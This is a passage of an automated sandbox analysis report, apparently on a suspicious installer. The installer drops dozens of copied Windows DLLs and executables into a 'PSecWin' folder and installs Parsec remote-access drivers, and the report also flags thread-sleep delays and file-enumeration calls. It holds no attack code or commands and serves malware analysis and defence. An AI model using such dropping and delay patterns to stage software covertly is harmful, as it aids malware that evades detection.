Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MGUI8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-NRIH7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CEDA5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-P56QD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE85A.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-H8DB6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PBFIO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-G4CQT.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-QSA3H.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-DQG3S.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BUN5H.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-USCFG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-ULHI4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-UI7FB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-8G60N.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-K5NEU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HI4IL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HA8AR.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\teams.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-H42SM.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-O0GNS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-N73AH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-JRFAI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-L6U16.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BK2QC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PGRCJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-IJKK2.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-9HECR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MHHB2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BOVF1.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HCV6V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-I39R4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-G92OK.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HQ9KB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\parsecd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PSU9B.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-U20SU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeAPI coverage: 5.1 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeAPI coverage: 5.5 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeAPI coverage: 7.0 %
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeAPI coverage: 8.8 %
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp TID: 6160Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files\Parsec\pservice.exe TID: 2828Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe TID: 2472Thread sleep count: 66 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00418318 FindFirstFileW,FindFirstFileW,free,5_2_00418318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_00406873 FindFirstFileW,FindClose,12_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_0040290B FindFirstFileW,12_2_0040290B
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC03A89C FindFirstFileExW,40_2_00007FF7EC03A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,46_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_00406873 FindFirstFileW,FindClose,46_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_0040290B FindFirstFileW,46_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C58EE4 FindFirstFileExW,49_2_00007FF763C58EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC85E4 FindFirstFileExW,52_2_00007FF694BC85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,66_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_00406873 FindFirstFileW,FindClose,66_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_0040290B FindFirstFileW,66_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F85E4 FindFirstFileExW,72_2_00007FF6750F85E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00419414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,5_2_00419414
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0041C7DC GetSystemInfo,5_2_0041C7DC
